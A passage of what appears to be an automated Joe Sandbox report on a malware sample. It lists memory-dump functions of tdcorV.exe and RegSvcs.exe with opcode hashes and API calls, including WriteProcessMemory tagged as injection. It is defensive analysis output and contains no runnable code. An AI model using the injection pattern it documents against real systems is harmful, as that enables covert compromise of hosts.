Instruction Fuzzy Hash: 0B21DE303002008BEB15566988947BE368EAFC475CF1880BDD606EBB99FE3ACC42D381

Function 013B62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c7c98b14178a7e754b20f874dd6223cd7358df678946664494013143214d55
Instruction ID: bd81ea3cc674854ab65ab950ea7d65e7511a716a397f3aa502137bb717066ad2
Opcode Fuzzy Hash: 38c7c98b14178a7e754b20f874dd6223cd7358df678946664494013143214d55
Instruction Fuzzy Hash: 652149357066118FC7259A39C89493EB7A2FFC57887044469DA1ECBBA5DF30CC02CB80

Function 013B28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcab832345165d89ae8dc65f1daa8f2450c0d3d049cd159b4697d20bc2ec9670
Instruction ID: c7a09ca024b423c44bbb9cde29ac4506c7bdc0bd97f6966455323755a37d8c35
Opcode Fuzzy Hash: fcab832345165d89ae8dc65f1daa8f2450c0d3d049cd159b4697d20bc2ec9670
Instruction Fuzzy Hash: C4218135A00109DFCB15DF38D880AEF37A5EB9D264B508519D9199B350EB31FA52CBD0

Function 0136D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920179886.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_136d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c9a642dc46b7bc378ce5c148a82f1bafd35b51780993a3d093e6ed28eef6b86
Instruction ID: 95bfc855ff362559d80ec4635db6f50c61871df598dd4df8f7a1e0c26e37ea74
Opcode Fuzzy Hash: 8c9a642dc46b7bc378ce5c148a82f1bafd35b51780993a3d093e6ed28eef6b86
Instruction Fuzzy Hash: 312137B1604308EFDB11DF64D9C0B26BB69FB84318F20C56DE8894F24AC736D446CA62

Function 013B4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb567a10c98bae56af9641309a33f945f5290d257462359dc9b6ac287b8f07e
Instruction ID: acbe2c875eff3ba86a40abaef68327721752e52d2fe86b7acefa4617de82efc8
Opcode Fuzzy Hash: 8bb567a10c98bae56af9641309a33f945f5290d257462359dc9b6ac287b8f07e
Instruction Fuzzy Hash: 14319378E11309CFCB48DFA8E59499DBBB2FF49704B208469E819AB324D735AD05CF40

Function 013B5649 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e1ff1c27193a13c1dd45d4511b71f835dd3788f4f77a34550c5212d5ca0da7
Instruction ID: 295c2c3551ccf6e625a51216dce9b8aa8cb90b2ada0ca73904401d95717f2209
Opcode Fuzzy Hash: c7e1ff1c27193a13c1dd45d4511b71f835dd3788f4f77a34550c5212d5ca0da7
Instruction Fuzzy Hash: FD21C372B011099FDB11AF68E884BAF3BA1FB48758F004468EA19DB744DB35CD65CF90

Function 013B9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87292109310ba9d0e4da994dad7198293f7281271cbaa3418db912145632e6c2
Instruction ID: 79a5e0d7ffa3036f6ca9319d97fc43b0824347d7f26f30cf1a7f3253017bb4e4
Opcode Fuzzy Hash: 87292109310ba9d0e4da994dad7198293f7281271cbaa3418db912145632e6c2
Instruction Fuzzy Hash: 5F2188B0E012489FDB05CFB5D590AEEBFB6AF48219F148059E614E7290EB30D940CB20

Function 013B6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c932c475cf65b5e0505dd919866bb95cbd83d1c491f65e5ab470c8eaef3fb23c
Instruction ID: 3114884071070f1175313c40f1732beb5fe5ce1d7c2395c2bc47e90afff7809f
Opcode Fuzzy Hash: c932c475cf65b5e0505dd919866bb95cbd83d1c491f65e5ab470c8eaef3fb23c
Instruction Fuzzy Hash: 131102317026118FD7195A2AC89493E77A6FFC56983080468EA0ACBB61DF31DC01CB80

Function 013BF640 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f57167172da90951e90daafcff77714f206631976f707afad896d38194ebfe
Instruction ID: e95628b915d23bd1449589d997a018f2494d9da34ebb25969e03586b0b46bc20
Opcode Fuzzy Hash: 12f57167172da90951e90daafcff77714f206631976f707afad896d38194ebfe
Instruction Fuzzy Hash: 9D216AB1E00209DFEB45EFB9D94079EBBB2FB85704F1085A9C1589B324E7348A058B81

Function 013B27F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58979a16afd3f2d9aaf8f0d51193d15758641645133854422904e5be7349e9ed
Instruction ID: 1cac8d0dfee480ee2a04485e320607c2708aec5188646d1be48c332443b22b86
Opcode Fuzzy Hash: 58979a16afd3f2d9aaf8f0d51193d15758641645133854422904e5be7349e9ed
Instruction Fuzzy Hash: F521CEB4D0060A8FCF40EFA9D8846EEBFF5EF59310F10566AD919B3214EB305A95CB90

Function 013BF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f72283cda897585c2618e61b6efc6d4f7b4760e32d4e81bd2dd95ec4b21350
Instruction ID: bc8ac1c106eabd576a2b488d7f540e0ada811f5791560e58e6fab2b4567e55f0
Opcode Fuzzy Hash: 20f72283cda897585c2618e61b6efc6d4f7b4760e32d4e81bd2dd95ec4b21350
Instruction Fuzzy Hash: D6112671E0020DDFEB44EFB9D840B9EBBF6FB84704F10C5A9C118AB264EB305A059B81

Function 0136D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920179886.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_136d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction ID: acba3da2dc4593507e3a9ce6d6b1fd9c7c8d85b63749c40fd55a015b99686157
Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction Fuzzy Hash: 6411BB75604284DFCB12CF54C9C4B15BFA2FB84318F24C6A9D8894B656C33AD44ACF62

Function 013B5E98 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3919da429d8c633ecf4018a2cc4945044727a80c3a66c8ea1dbd27eabc8e2e7
Instruction ID: 94da4725693bc22304302c4a0b2b8174a56d8f30a8a4f9cdab4b47d956011982
Opcode Fuzzy Hash: f3919da429d8c633ecf4018a2cc4945044727a80c3a66c8ea1dbd27eabc8e2e7
Instruction Fuzzy Hash: D301D433B002196BDB419EA89850BEF3FAAEBC8694F148429FA09C7244DE318D16D794

Function 013BABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d847dd1d90cdf637577e3070e5c1b0bc1d0cb549465a3ed251c3ca8dca50c76c
Instruction ID: a20801102419f625e4928128484bac7fa130d22d789a3f66f3f409d7af87e7e9
Opcode Fuzzy Hash: d847dd1d90cdf637577e3070e5c1b0bc1d0cb549465a3ed251c3ca8dca50c76c
Instruction Fuzzy Hash: 1CF0F631700A104BDB169A2E98D4A6ABADEEFC8A593054479EB0DC7761FE31CC03C380

Function 013BE8E8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2a857b069f900837d9cda6b99a8e32c33bcb6a5ef8f645c81e358653207f7a
Instruction ID: f0d7968532f01398325d8e8f471dc797ccde6ffd9b1d5164613943da058c37e7
Opcode Fuzzy Hash: 7e2a857b069f900837d9cda6b99a8e32c33bcb6a5ef8f645c81e358653207f7a
Instruction Fuzzy Hash: 87011E79D0020AEFDF40DFA8E444AEEBBB1FB49305F508566D924A3354D7355A16CF90

Function 013BAF36 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3d9a5b45e35bdf8422ae7c3068b69be51a91fac695f6f7da8657bafa516beb
Instruction ID: b0ebdf5bf217b408282c0616f00d3c4b60f41a5d6310057445b801f423b50111
Opcode Fuzzy Hash: fb3d9a5b45e35bdf8422ae7c3068b69be51a91fac695f6f7da8657bafa516beb
Instruction Fuzzy Hash: EF01A476604240DFDB059F68DC91BC9BF71FF8A324F444596E9219B2E2C7319C15CB10

Function 013BFF89 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbcc74ef6dff3f238a693246ef8e8fbbcc9b053ac398d863b53f28c9f930a8e
Instruction ID: 2b97d5b0c2f9b311f0f418f0eeff2c45c0daaf6c2bcf26f9f8f7efd717d30570
Opcode Fuzzy Hash: dfbcc74ef6dff3f238a693246ef8e8fbbcc9b053ac398d863b53f28c9f930a8e
Instruction Fuzzy Hash: 64D02B321197501FC352A27CFC00CCF3F672DC2910301866AF004C7911CBA4AE5443F2

Function 013B28A2 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23de7e6dd18ad32bf13d4d50ae3bdd11d45762dbec0aae59a9883138039d6c53
Instruction ID: 7742df931db1cbc80bd1396abea53259fbd235237ea9a745c4da983122d02e11
Opcode Fuzzy Hash: 23de7e6dd18ad32bf13d4d50ae3bdd11d45762dbec0aae59a9883138039d6c53
Instruction Fuzzy Hash: F1E08676E50326C7CB01E7A0DC440EEB734EFE1222F54865BC46532594EB306659C7A1

Function 013B28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752b92b64c92b27268eafcfc17d8a8ee53354b6b961939af0c757cfaefb69637
Instruction ID: def143b6059df658e2089b5dc3948d17b27f13cf8b47f3e2ae2ef0d4750922b5
Opcode Fuzzy Hash: 752b92b64c92b27268eafcfc17d8a8ee53354b6b961939af0c757cfaefb69637
Instruction Fuzzy Hash: 1FD05B31D2022B97CB00E7A5DC044DFF738EED5261B504666D51537140FB713659C6E1

Function 013B6739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a6b92f78e434292771bb855aebc6cfb68336091e2b81baaef711fe2270dbe1
Instruction ID: c41bb1f4eee4b34294b8dfc3d011c739edfe97ebef7d0e457ef83d4178c71324
Opcode Fuzzy Hash: 04a6b92f78e434292771bb855aebc6cfb68336091e2b81baaef711fe2270dbe1
Instruction Fuzzy Hash: 66D05E3391438A0AD702B3B8BC1A7A53B69B78491CF448960D0890A60AEF745426C751

Function 013BD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e505df18a084e007c268505c36943ed3a7f11c526b2f38389e85012da91e9f2
Instruction ID: b6343ccbca851797ddb21893a776974e8c8a131b26630d421842f75e67554f01
Opcode Fuzzy Hash: 4e505df18a084e007c268505c36943ed3a7f11c526b2f38389e85012da91e9f2
Instruction Fuzzy Hash: B4D04235E4410DCBCB20DFA8E8845DCBB75EB89665B10542BD929A3651D7305865CF11

Function 013BAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd07917fe55485eb1858a4bc2b35e223518ac8d2096aa71b8a42ff91336ea6c
Instruction ID: f77abea7928e9ab57a07db21d0cb9a98b319cfd0bb5e6262b50b86a699e96241
Opcode Fuzzy Hash: 4fd07917fe55485eb1858a4bc2b35e223518ac8d2096aa71b8a42ff91336ea6c
Instruction Fuzzy Hash: 43D0677BB40008AFCB049F98EC40DDDF776FB98221B448516E915E3260C6319965DB50

Function 013B6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23bad2d07e3dee6d38ae50ffb9cc62e8c57ddf87ba9a126c08d01c9c60331470
Instruction ID: f1771b8791c0abdf4cec7737ed2cff1f16cca28dfaab0ece0de59cc6b76b1ce2
Opcode Fuzzy Hash: 23bad2d07e3dee6d38ae50ffb9cc62e8c57ddf87ba9a126c08d01c9c60331470
Instruction Fuzzy Hash: 01C0123280030D4BD641F7F9FC48A95336AB6C490C740852094090A74DEF7469554B91

Non-executed Functions

Function 013BF961 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 340ca4df1dd9e52b841fba85606aff8166553aa032863f1288682035849b936c
Instruction ID: 53c2ac578c7a2e27c84446ec5954c808cbed40fbbb0284cfdac84e8f3c0755e7
Opcode Fuzzy Hash: 340ca4df1dd9e52b841fba85606aff8166553aa032863f1288682035849b936c
Instruction Fuzzy Hash: 24C1C175E00218CFEB14DFA9C994B9DBBB2BF89304F2080A9D909AB355DB355E81CF50

Function 013BF2C0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245763c5d845f7be4f4ead50661bf1fc59d6efb91a21789b57f30cee95bc478b
Instruction ID: 0673cecdb17f487afc6e932d6c2d977257771f0181f7e8fc8f5dbf5bf9cc467f
Opcode Fuzzy Hash: 245763c5d845f7be4f4ead50661bf1fc59d6efb91a21789b57f30cee95bc478b
Instruction Fuzzy Hash: EF513B71D01208CFEB18DFA9D8847EDBBB6BB89308F14D129D6047BA94EB759881CF54

Function 013BF52F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45d29a8a388f371ccc4b9312730e2ca69a44a2dcc855387485fecb004db84bac
Instruction ID: aa6e89b3ce5c9a7c84a6ff233b5a59859057fc12718d63a85b8e831051eceb95
Opcode Fuzzy Hash: 45d29a8a388f371ccc4b9312730e2ca69a44a2dcc855387485fecb004db84bac
Instruction Fuzzy Hash: FC514770D05208CFDB15EFA8D8C47EDBBBABB49308F24A119D208BBA55E7359881CF54

Function 013BF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3920599154.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13b0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3612d6524e70a9374f5e989073c42b90987507c7cada5efb495e08d9c97fb7fd
Instruction ID: 186db309884c7403d61f69a5beb527e484588c4341123b4b36fa6476c55902f7
Opcode Fuzzy Hash: 3612d6524e70a9374f5e989073c42b90987507c7cada5efb495e08d9c97fb7fd
Instruction Fuzzy Hash: B8512770D01208CFDB14DFA8D8C47EDBBB9BB49308F20A129D619BBA94E7359881CF54

Analysis Process: tdcorV.exePID: 5056, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	299
Total number of Limit Nodes:	15

Executed Functions

Function 07112F68 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07112FEF

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 637dd8bb70040168b238fcd8ef4604e52b0e383921c00fae708201e8ebf64329
Instruction ID: e5ce87f10d5cb17a72191c20362fdd58f238420a0be614c21f7fcce5e41e44b6
Opcode Fuzzy Hash: 637dd8bb70040168b238fcd8ef4604e52b0e383921c00fae708201e8ebf64329
Instruction Fuzzy Hash: E921DEB6901359DFCB10CF9AD884ADEFBF5BB49310F14852AE928A7250C375A544CFA1

Function 07112F70 Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07112FEF

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 17f5ef543f5d2bc1bb7d51341d8a00f5940f1582cc6f5f1e2c8282bb6ccdd63e
Instruction ID: 5fe2d2a3c9eeb79f51cce74ac4b7c21c2ae41197beb8b9d17ed5de3d6a85061f
Opcode Fuzzy Hash: 17f5ef543f5d2bc1bb7d51341d8a00f5940f1582cc6f5f1e2c8282bb6ccdd63e
Instruction Fuzzy Hash: C521BFB5900759DFCB10CF9AD884ADEFBF4FB48310F10842AE918A7250D375A544CFA5

Function 0711E36C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0711E5AE

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8e53a736ba571ae0b6b83ba619838c04d43a6f163f5ca8c8682e5ca0e8e5ed1b
Instruction ID: e398d745928960825c6c47b1a55aedfaff36cad51082f2e195fc51080a718702
Opcode Fuzzy Hash: 8e53a736ba571ae0b6b83ba619838c04d43a6f163f5ca8c8682e5ca0e8e5ed1b
Instruction Fuzzy Hash: DAA15EB1D00319CFEB21CFA5C8517DDBBB2BF48311F1485A9E848AB280DB759985CF91

Function 0711E378 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0711E5AE

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a43f7c211851096cf6dd9451f26b3e52fd775db4a9638131601f6f8bbc12b567
Instruction ID: e0e833abcafab349a5762ef2bbfe1f8f10a524072564faa6d9a6e0d8ed2658a2
Opcode Fuzzy Hash: a43f7c211851096cf6dd9451f26b3e52fd775db4a9638131601f6f8bbc12b567
Instruction Fuzzy Hash: 17915DB1D00719CFEB21CFA9C8517DDBBB2BF48311F1485A9E808AB280DB759985CF91

Function 0291C038 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0291C29E

Memory Dump Source

Source File: 0000000A.00000002.1526887735.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2910000_tdcorV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 94cff2f96281851fe61db35a0a7c7f886ee50e3fc584d50babecfd99b71b1d06
Instruction ID: 6e98780ceee359e9b354024ac5177ac8611e7fa6f976bcd7201a8f122384d755
Opcode Fuzzy Hash: 94cff2f96281851fe61db35a0a7c7f886ee50e3fc584d50babecfd99b71b1d06
Instruction Fuzzy Hash: AA814670A00B098FDB24DF6AD44479ABBF6FF88704F00892AD44AD7A40DB75E946CF91

Function 02914598 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02916B31

Memory Dump Source

Source File: 0000000A.00000002.1526887735.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2910000_tdcorV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: bfda5f7a723e7fd5c5c9495ccd5da7779a9dbbf1a015150fdffcce0c6a787c5b
Instruction ID: 6f1ace052056608fed15b76493ec4dfd44600098db6ceca0d2f2c200642b3ce5
Opcode Fuzzy Hash: bfda5f7a723e7fd5c5c9495ccd5da7779a9dbbf1a015150fdffcce0c6a787c5b
Instruction Fuzzy Hash: A941D1B0D0471CCBEB24CFAAC844B9EBBF5BF89304F20846AD408AB251DB756945CF90

Function 02916A7B Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02916B31

Memory Dump Source

Source File: 0000000A.00000002.1526887735.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2910000_tdcorV.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b1d2c3a95bc20bdc11ecea28f84c348795bb3b117f3dd91e3ae7d9319a2dda68
Instruction ID: a34cb62cdf0631a5d5cafb0aefc7c2ee1ca8f5c7ec05faf9a8238c90398b9369
Opcode Fuzzy Hash: b1d2c3a95bc20bdc11ecea28f84c348795bb3b117f3dd91e3ae7d9319a2dda68
Instruction Fuzzy Hash: 9B41B0B0D04719CFEB24CFAAC844B9EBBF5BF89304F20846AD408AB255DB756946CF50

Function 070FADC0 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 070FAE5F

Memory Dump Source

Source File: 0000000A.00000002.1543484450.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_70f0000_tdcorV.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b53aa710839d8f50a49a8d3d4f2af10a82d5fbcace3c4c60221728383a43172b
Instruction ID: 31c36276de7c418ce000f15328670a0d072c9dc86990a1fcad1adce189869afd
Opcode Fuzzy Hash: b53aa710839d8f50a49a8d3d4f2af10a82d5fbcace3c4c60221728383a43172b
Instruction Fuzzy Hash: 3231E2B5D0034AAFDB11CF9AD884A9EFBF5BF48314F14842AE919A7710D374A544CFA1

Function 0711E0E8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0711E180

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5534c77100aacb396ecd9d40456ffc1a5b58d2c512b9c9baeee0dfb1f8d18da1
Instruction ID: 182ac25cffaf6c4fb624adc71a9404ded1a2f882314c830b0783302e838c656a
Opcode Fuzzy Hash: 5534c77100aacb396ecd9d40456ffc1a5b58d2c512b9c9baeee0dfb1f8d18da1
Instruction Fuzzy Hash: 3F2128B1900349DFDB10CFA9C845BDEBBF1BF48310F148829E958A7340C7789945DB61

Function 070FADC8 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

